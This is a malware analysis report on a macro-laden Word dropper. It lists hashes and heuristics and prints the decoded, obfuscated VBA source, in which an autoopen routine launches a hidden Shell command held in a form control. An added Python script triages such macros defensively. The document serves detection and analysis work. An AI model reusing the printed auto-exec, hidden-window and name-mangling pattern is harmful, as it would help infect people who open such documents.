Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5fc837cec1abb150…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 89.4 KB
Created: 2018-12-17 14:02:00
Authoring application: Microsoft Office Word
First seen: 2019-01-12
MD5: 47c5793e1919603b6109de3f337a0b97
SHA-1: 0bea13119d2c3cc90e680f3db548843f9adb3293
SHA-256: 5fc837cec1abb150354341cfd7c63d4207320bf62164728c435cab8d8c953bcd
Risk score: 252

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros with an autoopen entry point, a standard technique for running code as soon as the document is opened. Sub autoopen() calls tGOPDAI, which wraps a single Interaction.Shell(hUmNOD, IujFN) call in dozens of lines of junk arithmetic on variables that are never assigned; those lines would raise run-time errors (division by zero on empty variables) if On Error Resume Next did not swallow them, and they have no effect on the command. The command string hUmNOD is assembled from qNQDMDBzsn.TextBox1.Text plus further unassigned names, so the actual command line is stored in a TextBox control on the document module rather than in the macro source, and IujFN is a Const equal to 0 (vbHide), which starts the child process without a visible window. The OLE_VBA_SHELL and SC_STR_CMD heuristics therefore indicate that cmd.exe is used to launch a second stage, and the ClamAV detection Doc.Dropper.Emodldr-6787519-0 is consistent with a dropper document. No URL or payload is recoverable from the decoded macro source alone; the TextBox contents (VBA form strings) are needed to see the next stage.

Heuristics (9)

  • ClamAV: Doc.Dropper.Emodldr-6787519-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Emodldr-6787519-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Call to Interaction.Shell() whose command string (hUmNOD) is assembled at run time; the second argument IujFN is a Const equal to 0 (vbHide), so the child process is started without a visible window.
    Matched line in script
          iGibFcXwYPsDLmRYZ = 31275022 - qawPuFfGUlwjVi
    bjZmmKpzP = Array(qauMQuXZo, lrkWZWCKZ, XZHvqpAS, Interaction.Shell(hUmNOD, IujFN), jlzzBP)
       kYLEMauMmdLWnzIozRmizuM = ZMrMWwnWJpIJQYSHjF * Rnd(15066153 / Sin(mswwEjwzViwpLoizihpo)) / Wfd + Int(272283075 - Rnd(267108026 - Tan(89540666) * 332336670 - Cos(wYYziBtsjkhOvHmzqBitTz)) / 179893052 * Sin(299214531 / Tan(124834288) / 168073438 / Hex(338294192))) + 103023491 + CStr(94053476) - 278479631 / CLng(326927646) * 201644890 - Fix(1606189 - Hex(43160812) * 41248844 / ChrW(ZzrdCzfEzlnZCown / 231159796))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    Sub autoopen() runs automatically when Word opens the document and calls tGOPDAI, the function that contains the Shell call.
    Matched line in script
    Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
    Sub autoopen()
    tGOPDAI
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag. The matching string is not reproduced in this report; no literal cmd.exe string appears in the decoded macro source shown below, consistent with the command line being held in the TextBox control rather than in the VBA code.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that for this sample the "no modern VBA project was recovered" wording is stale: a VBA project was extracted (macros.bas below, containing Sub autoopen), so this marker duplicates OLE_VBA_AUTOOPEN rather than adding independent evidence.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography  In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml  In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main  In document text (OLE body)
    All three are standard Office Open XML namespace URIs that appear in benign Word documents; none is a download or callback address, and they should not be treated as indicators.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8748 bytes
SHA-256: 7f5af0c237b4ca9c1be11d347e96486645a78c5711731221c6390ccfd99be513
Detection
ClamAV: No threats found (the Doc.Dropper signature above matched the OLE container, not this decoded source text)
Obfuscation or payload: likely
126 of 158 identifiers look randomly generated (e.g. 'wLizKcBIiwJtLOqBkXNbBPtM'), consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "qNQDMDBzsn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
tGOPDAI
End Sub

Attribute VB_Name = "XncJnfpP"
Function tGOPDAI()
On Error Resume Next
   YjowwnkPhAufRo = LAVfmEPCrqqQin * Rnd(249688220 / Sin(wuXQhuapmvYpTn)) / Wfd + Int(23305211 - Rnd(81078469 - Tan(186856072) * 22805674 - Cos(fJbnwJdwHGWFcvww)) / 243205909 * Sin(306614404 / Tan(159332502) / 136242358 / Hex(114560741))) + 169175201 + CStr(206843626) - 292706185 / CLng(284122696) * 212018548 - Fix(172825999 - Hex(231434735) * 23530617 / ChrW(ioaZGsXGaHDzTjQpwtUrSR / 27523571))
      wFdiwQiutUciiCpGZiUQQ = 131101643 - vcBjjOLUMkscAOo
   kjhwodanwTwmFWNnzpwZQu = vqAaGmtmrvvrMDHciaCYWQAu * Rnd(154670009 / Sin(KTQamVpnmFnDUBEhF)) / Wfd + Int(283105036 - Rnd(65582854 - Tan(200031077) * 9736224 - Cos(qNPwNWafqFCocaVQIaCYR)) / 10639961 * Sin(268335748 / Tan(207438850) / 44695418 / Hex(11849438))) + 130443568 + CStr(268031359) - 69599164 / CLng(62259298) * 242914632 - Fix(296981286 - Hex(107539546) * 173577285 / ChrW(CKoHTNHPhAfYiLoijccS / 269729090))
      jrMClUhUJYCzSFUSiLJ = 252379175 - fbdpdVbBQnHoibw
   wOYavVdfYLjalVRubtFdwGc = IqWMbSUiNIBsYpbdWD * Rnd(215607133 / Sin(aKsiiARJzRwrmD)) / Wfd + Int(122190857 - Rnd(33796436 - Tan(334322246) * 114271379 - Cos(GrCNdUZVmScHua)) / 179316161 * Sin(306520079 / Tan(324272620) / 325149052 / Hex(288984605))) + 192468135 + CStr(174959689) - 5247635 / CLng(69955766) * 197842101 - Fix(315127068 - Hex(84060418) * 60697463 / ChrW(UXWiEzaJXzPKJff / 282498646))
      KBRLJVHGodFjYRQLTAP = 321044899 - CvzRWzhhTvVTGlLruLBOXQVU
   zlMWfMDSnctzWbXDEo = bjlwXQwbFYMrjVNvXcIsLOR * Rnd(231776465 / Sin(BqzfkjiZqwqNmpFjkwu)) / Wfd + Int(180204272 - Rnd(243595344 - Tan(62009883) * 186908092 - Cos(jAbvwiNOCXWZzwV)) / 286971639 * Sin(199683248 / Tan(121589457) / 294320737 / Hex(166461022))) + 155508388 + CStr(223250383) - 243436881 / CLng(256570256) * 16594676 - Fix(63318168 - Hex(173681398) * 101819453 / ChrW(HqrOowjEmcIibKPTjj / 267147307))
      DzSQDlwPotmHzrujiLKz = 244801557 - spjqwWVTVZllTKXbLDAUQs
   WwskXTQWiUovJNquLCpa = oUBAMZmKCDfWisKvKTXL * Rnd(201888251 / Sin(LaBQnLmWNovwidqj)) / Wfd + Int(75198172 - Rnd(300043030 - Tan(195185665) * 78577147 - Cos(RIZfUjwBjSOzdIazvmbX)) / 213319430 * Sin(278530180 / Tan(284067486) / 172083407 / Hex(209242197))) + 65423323 + CStr(213083745) - 32154259 / CLng(178367322) * 54599625 - Fix(197110160 - Hex(225243307) * 123311104 / ChrW(uSclSioUdWhwFVQjPHCo / 336478191))
      RzzKAtaaojhzOIWKTwj = 77655445 - UshELorsWjijTAdl
Const IujFN = 0
   ZtEEXSCppKURBOqLzTf = nPVFKODJkXFuiZcYqDWG * Rnd(53676802 / Sin(wGoVqAGthKIFnKXztIPt)) / Wfd + Int(35879476 - Rnd(120247831 - Tan(34959427) * 175786955 - Cos(bmSUwzYVKQOQpYCDqqvld)) / 248186022 * Sin(123821491 / Tan(5087221) / 287066726 / Hex(62016528))) + 93242214 + CStr(284535299) - 98012575 / CLng(152172811) * 215394841 - Fix(10375723 - Hex(90263662) * 256486319 / ChrW(OnZlMkkdtIiEjNqOc / 64993934))
      FpTRcmjhGnkNDCJnPRFiAs = 55634558 - sJEiiYIErYhYvWwwdDi
   VrBwdPYAwKdZAiojhbQUq = OccpjzzjTwEvwtqvrrhzRHnW * Rnd(197402870 / Sin(QYPjRvtYcYUniYCNrf)) / Wfd + Int(140420761 - Rnd(34077332 - Tan(237688118) * 307736731 - Cos(mjYntfHpGLNjZTkjIBaRRb)) / 27029864 * Sin(55265740 / Tan(62525598) / 309966922 / Hex(29888070))) + 106211954 + CStr(52699557) - 8583296 / CLng(163325538) * 231020953 - Fix(141754603 - Hex(231622928) * 196529565 / ChrW(sIzsUjOcVodtHwMDJdXKfQdw / 178716493))
      hEmiOppkozChwiNbmURKIJo = 142213543 - sLTTcfBRdBJqranEWKM
   ZifIfhIlKoQuZIpDPbiiJn = nvcLzRBNZJzwJDs * Rnd(253513706 / Sin(mUQMbfSGjVworz)) / Wfd + Int(208600063 - Rnd(244062559 - Tan(165693417) * 289097612 - Cos(DWJTIbqlZJjAWoiv)) / 271020406 * Sin(156349109 / Tan(319773763) / 78851331 / Hex(104772978))) + 64967307 + CStr(34532052) - 124154756 / CLng(318120958) * 23580339 - Fix(163358124 - Hex(227629918) * 79718492 / ChrW(NkLfjidBHkluswzVbz / 57380491))
      qNcfztQqXFCHYF = 315479626 - orFESoQLaVRITbcZZKdAHfip
   mcquhCllGkSnHaDHfZIwV = fOOZIzYzSsJGCZ * Rnd(286661519 / Sin(dHddtmSzUVpWkPzZQkwbjIto)) / Wfd + Int(84126167 - Rnd(44752362 - Tan(122042426) * 169359024 - Cos(AYiPhwASrItvOFnICOCs)) / 239387758 * Sin(277727557 / Tan(118762146) / 187276225 / Hex(102864787))) + 120224638 + CStr(137928963) - 90303784 / CLng(270081443) * 112791056 - Fix(257154033 - Hex(131266168) * 294693050 / ChrW(TwKGDTwGZcDjRCGjKs / 107208813))
      tKGCAPbndaVZDslqzvLi = 304696424 - RpZjARHIGvDLcIqIGnrL
   JHzCMwfPXCLLKpV = jzkUlwNivRITrzEFddu * Rnd(6927269 / Sin(DmtUwpFhHXYjkPZDbWLuV)) / Wfd + Int(41089818 - Rnd(312292035 - Tan(279512996) * 83493136 - Cos(YwGijuUqdNrzoIIzotj)) / 252559640 * Sin(43299496 / Tan(236206413) / 201136276 / Hex(9434150))) + 9621513 + CStr(46426773) - 232765097 / CLng(46296899) * 84499575 - Fix(322997850 - Hex(281059994) * 18590435 / ChrW(YRGaZrdMulMMbhC / 247606559))
      RBHaRoUEjZLNdjWorQr = 10464422 - PCFaMwSoZZjVofpvhH
hUmNOD = qNQDMDBzsn.TextBox1.Text + CidVnAD + tEiCwQF + IXwddhO + pJIQqjKO + AiIPurfV + DqaGNFP + FvHLFO + dNCrinI + zHBlzMlA + jBDlQdpX + SDBYQCHZ
   qlkrcfoVbmKzjIC = SMiJtpUVDlvdPr * Rnd(339907987 / Sin(KXGTsdSZXvwIHYEXGwjDoO)) / Wfd + Int(91589800 - Rnd(3336356 - Tan(117754147) * 100763434 - Cos(qjKFjnVnLCiIotElwtLOfj)) / 160934470 * Sin(152846659 / Tan(128164292) / 57809373 / Hex(317030761))) + 4239887 + CStr(317426502) - 64049154 / CLng(38249106) * 11794526 - Fix(194995057 - Hex(278143301) * 185527854 / ChrW(MqMVlktUXnuJjcPGGBIJLn / 250295218))
      rUrCwjfwROYIjqcunDz = 209253104 - mQUuwvchSiZEmiQtq
   zaZMVjaEFfslDCjENMYci = uJIGUZGzwCNNGTmzjNFER * Rnd(253295210 / Sin(KNksaqHXuHOjQE)) / Wfd + Int(99121152 - Rnd(94940117 - Tan(6576197) * 327796251 - Cos(ipXpwMSNjLXZRHH)) / 326146376 * Sin(298447680 / Tan(239400093) / 216158026 / Hex(215285022))) + 55263975 + CStr(272075840) - 201705966 / CLng(121328539) * 42332541 - Fix(288148477 - Hex(262831132) * 145672402 / ChrW(QzEHKDMmXojHcbMXizYIGVi / 132760525))
      wtLFjEYwTPLSSGDuK = 143188380 - AYfORuYuPNovVjqMKBhojILJ
   dZzcisKVnwaVSSVbiw = cUCGNknYDSiAOlGEmslr * Rnd(65018286 / Sin(UUHUdZcRpTzBfCa)) / Wfd + Int(128789816 - Rnd(250454550 - Tan(288463416) * 283986435 - Cos(GDJwMjMOjitETVAiwt)) / 44574017 * Sin(93872748 / Tan(316305897) / 246950236 / Hex(194077270))) + 72330768 + CStr(21024318) - 84518806 / CLng(38216564) * 28540771 - Fix(196040936 - Hex(124847294) * 45533012 / ChrW(AqARKLHuMOiGZsiKBrUslcX / 140165953))
      wszdIkQbzEcUjYnlMBh = 17992405 - kKivCmwNIXTfrLSIQE
   MowknhzfBSiHvAaGLici = iLCLvdViAHHkfdDOkpOwZ * Rnd(230190825 / Sin(cPiEJNFbHSsdcvZsEdA)) / Wfd + Int(5828540 - Rnd(72071321 - Tan(179796505) * 154411524 - Cos(XXrapNjLznawQYMRu)) / 210573955 * Sin(339800184 / Tan(117613211) / 257474823 / Hex(337850575))) + 178964041 + CStr(127416708) - 77489691 / CLng(321597287) * 66585151 - Fix(136228743 - Hex(165905101) * 224362286 / ChrW(ArOhlVflumhipUcb / 208330746))
      iGibFcXwYPsDLmRYZ = 31275022 - qawPuFfGUlwjVi
bjZmmKpzP = Array(qauMQuXZo, lrkWZWCKZ, XZHvqpAS, Interaction.Shell(hUmNOD, IujFN), jlzzBP)
   kYLEMauMmdLWnzIozRmizuM = ZMrMWwnWJpIJQYSHjF * Rnd(15066153 / Sin(mswwEjwzViwpLoizihpo)) / Wfd + Int(272283075 - Rnd(267108026 - Tan(89540666) * 332336670 - Cos(wYYziBtsjkhOvHmzqBitTz)) / 179893052 * Sin(299214531 / Tan(124834288) / 168073438 / Hex(338294192))) + 103023491 + CStr(94053476) - 278479631 / CLng(326927646) * 201644890 - Fix(1606189 - Hex(43160812) * 41248844 / ChrW(ZzrdCzfEzlnZCown / 231159796))
      XAzfjEBidqmCNoB = 182636235 - sKBqVSWvhmZMarKvujF
   tqFrzGzZFbPjwlMlvKFlh = TrQwrFMqCPthZIQ * Rnd(231224526 / Sin(wLizKcBIiwJtLOqBkXNbBPtM)) / Wfd + Int(98851325 - Rnd(169736716 - Tan(95004) * 262447081 - Cos(MDULOHazKIPOnIGDz)) / 283645334 * Sin(2143817 / Tan(17377676) / 210469338 / Hex(273805331))) + 248019867 + CStr(19405753) - 52097988 / CLng(306197041) * 234075767 - Fix(114252800 - Hex(141177071) * 237118744 / ChrW(cNsWuohwHQCZOwMOGmJRi / 340293542))
      kWRRETXJiaYmAvmMOPusm = 195723283 - XEvjdiLSBdcHzcXdd
   siJUppcGrTDnjh = DQXzSBqNWZalaBsJmultAhQ * Rnd(178375296 / Sin(DzYNnvhbMNwpYKzCUn)) / Wfd + Int(311488888 - Rnd(102561227 - Tan(26464540) * 14469917 - Cos(wKRtunqWzwiPBRz)) / 228526414 * Sin(195667212 / Tan(297665601) / 61511644 / Hex(89764349))) + 261358184 + CStr(303662075) - 127941019 / CLng(93749310) * 234175084 - Fix(250562206 - Hex(287896335) * 210929630 / ChrW(VLPAuaDWCnoWrwtuuwkVFRW / 307295251))
      RErCJHvKcikOPHrwMbGVrw = 312150398 - UooHKoEpVMcVMTtfsLO
End Function
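The Malware Insights paragraph, the OLE_VBA_AUTOOPEN / OLE_VBA_SHELL findings and the random-identifier ratio in the extracted-artifact section each describe a check that can be run over decoded VBA source. The script below is an added example by the editor, not part of this report and not oletools code: it finds auto-exec entry points, locates Shell() calls and resolves the window-style argument through a Const declaration, traces which terms of the command string come from a form control (and so are absent from the source), and computes a random-looking identifier share. SAMPLE_VBA is a constructed, cut-down sample modelled on the macros.bas listing above; the function names, the keyword list and the thresholds in looks_random are this example's own assumptions, while the WINDOW_STYLES values are the documented VbAppWinStyle constants.

```python
"""Static triage of decoded VBA source (added example; mirrors the report's
auto-exec, Shell() and random-identifier heuristics, thresholds are assumptions)."""
import re

AUTOEXEC = {"autoopen", "auto_open", "autoexec", "autoclose", "auto_close",
            "document_open", "document_close", "workbook_open", "workbook_close"}
# Shell() windowstyle values (VbAppWinStyle); an omitted argument defaults to 2.
WINDOW_STYLES = {0: "vbHide", 1: "vbNormalFocus", 2: "vbMinimizedFocus",
                 3: "vbMaximizedFocus", 4: "vbNormalNoFocus", 6: "vbMinimizedNoFocus"}
# Keywords/built-ins excluded from the identifier statistic (not exhaustive).
VBA_KEYWORDS = set("""sub function end const on error resume next dim as set if then
else elseif for to step each in do loop while wend call exit private public true
false nothing empty new and or not mod string integer long variant object boolean
array interaction shell rnd sin cos tan int hex fix cstr clng chr chrw mid len
replace text value createobject getobject wscript application me activedocument
thisdocument documents environ""".split())

_STRING = re.compile(r'"(?:[^"]|"")*"')
_IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
_SHELL = re.compile(r"\b(?:Interaction\.|VBA\.)?Shell\s*\(\s*([^,()]+?)\s*(?:,\s*([^()]+?)\s*)?\)", re.I)
_CONTROL = re.compile(r"\.(TextBox\w*|Label\w*|Caption|Tag|ControlTipText|Value)\b", re.I)

# Constructed sample modelled on the extracted macros.bas (not the real artifact).
SAMPLE_VBA = '''
Attribute VB_Name = "qNQDMDBzsn"
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
tGOPDAI
End Sub

Attribute VB_Name = "XncJnfpP"
Function tGOPDAI()
On Error Resume Next
   YjowwnkPhAufRo = LAVfmEPCrqqQin * Rnd(249688220 / Sin(wuXQhuapmvYpTn)) / Wfd
Const IujFN = 0
hUmNOD = qNQDMDBzsn.TextBox1.Text + CidVnAD + tEiCwQF
bjZmmKpzP = Array(qauMQuXZo, lrkWZWCKZ, Interaction.Shell(hUmNOD, IujFN), jlzzBP)
End Function
'''


def code_lines(src):
    """Code lines with Attribute headers, comments and string-literal contents removed."""
    for raw in src.splitlines():
        line = raw.strip()
        if not line or line.startswith("'") or line.lower().startswith("attribute "):
            continue
        yield _STRING.sub('""', line)


def find_autoexec(src):
    """Names of procedures Office runs automatically on open/close."""
    found = []
    for line in code_lines(src):
        m = re.match(r"(?:(?:public|private)\s+)?(?:sub|function)\s+([A-Za-z_]\w*)", line, re.I)
        if m and m.group(1).lower() in AUTOEXEC:
            found.append(m.group(1))
    return found


def resolve_const(src, name):
    """Integer value of `Const name = <literal>` if declared, else None."""
    pat = re.compile(r"(?:(?:public|private)\s+)?const\s+" + re.escape(name)
                     + r"\s*(?:as\s+\w+\s*)?=\s*(-?\d+)", re.I)
    for line in code_lines(src):
        m = pat.match(line)
        if m:
            return int(m.group(1))
    return None


def find_shell_calls(src):
    """Each Shell() call with its command expression and resolved window style."""
    calls = []
    for line in code_lines(src):
        for m in _SHELL.finditer(line):
            cmd, style = m.group(1), m.group(2)
            if style is None:
                value = 2                              # documented default when omitted
            elif re.fullmatch(r"-?\d+", style):
                value = int(style)
            else:
                value = resolve_const(src, style)      # e.g. Const IujFN = 0
            calls.append({"command": cmd, "style_expr": style, "style": value,
                          "style_name": WINDOW_STYLES.get(value, "unknown")})
    return calls


def trace_command(src, var):
    """Split the first assignment to `var` on + / & and classify each term: a form-control
    property (string lives outside the source), a variable assigned in the source, or a
    name never assigned (padding that evaluates to Empty at run time)."""
    assigned, rhs = set(), None
    for line in code_lines(src):
        m = re.match(r"(?:const\s+)?([A-Za-z_]\w*)\s*=\s*(.+)$", line, re.I)
        if not m:
            continue
        assigned.add(m.group(1).lower())
        if rhs is None and m.group(1).lower() == var.lower():
            rhs = m.group(2)
    out = {"control_refs": [], "assigned": [], "unassigned": []}
    for term in (re.split(r"\s*[+&]\s*", rhs) if rhs else []):
        if _CONTROL.search(term):
            out["control_refs"].append(term)
        elif term.lower() in assigned:
            out["assigned"].append(term)
        else:
            out["unassigned"].append(term)
    return out


def looks_random(ident):
    """Heuristic (assumed thresholds): 6+ letters with 3+ mid-word capitals or a 4+ consonant run."""
    letters = [c for c in ident if c.isalpha()]
    if len(letters) < 6:
        return False
    humps = sum(1 for c in letters[1:] if c.isupper())
    run = longest = 0
    for c in letters:
        run = 0 if c.lower() in "aeiou" else run + 1
        longest = max(longest, run)
    return humps >= 3 or longest >= 4


def identifier_stats(src):
    """(random-looking count, total unique identifiers, the flagged names)."""
    idents = {t for line in code_lines(src) for t in _IDENT.findall(line)
              if t.lower() not in VBA_KEYWORDS}
    flagged = sorted(i for i in idents if looks_random(i))
    return len(flagged), len(idents), flagged


def triage(src):
    """Summary in the shape of the report's heuristics; suspicious = auto-exec plus Shell()."""
    autoexec, calls = find_autoexec(src), find_shell_calls(src)
    for c in calls:
        c["trace"] = trace_command(src, c["command"])
    n_random, n_total, _ = identifier_stats(src)
    return {"autoexec": autoexec, "shell_calls": calls,
            "random_identifiers": (n_random, n_total),
            "suspicious": bool(autoexec) and bool(calls)}
```

On SAMPLE_VBA, triage() reports the autoopen entry point, one Shell() call on hUmNOD with window style 0 (vbHide), a trace showing that hUmNOD is built from qNQDMDBzsn.TextBox1.Text plus two names that are never assigned, and 12 of 16 identifiers flagged as random-looking. The practical consequence of the trace result is the same as for the real sample: the command line has to be pulled from the form control (olevba reports these as VBA form strings) rather than from the macro text. The regexes are deliberately simple; a Shell() argument that itself contains parentheses, or a command built across several assignments, needs a real VBA parser.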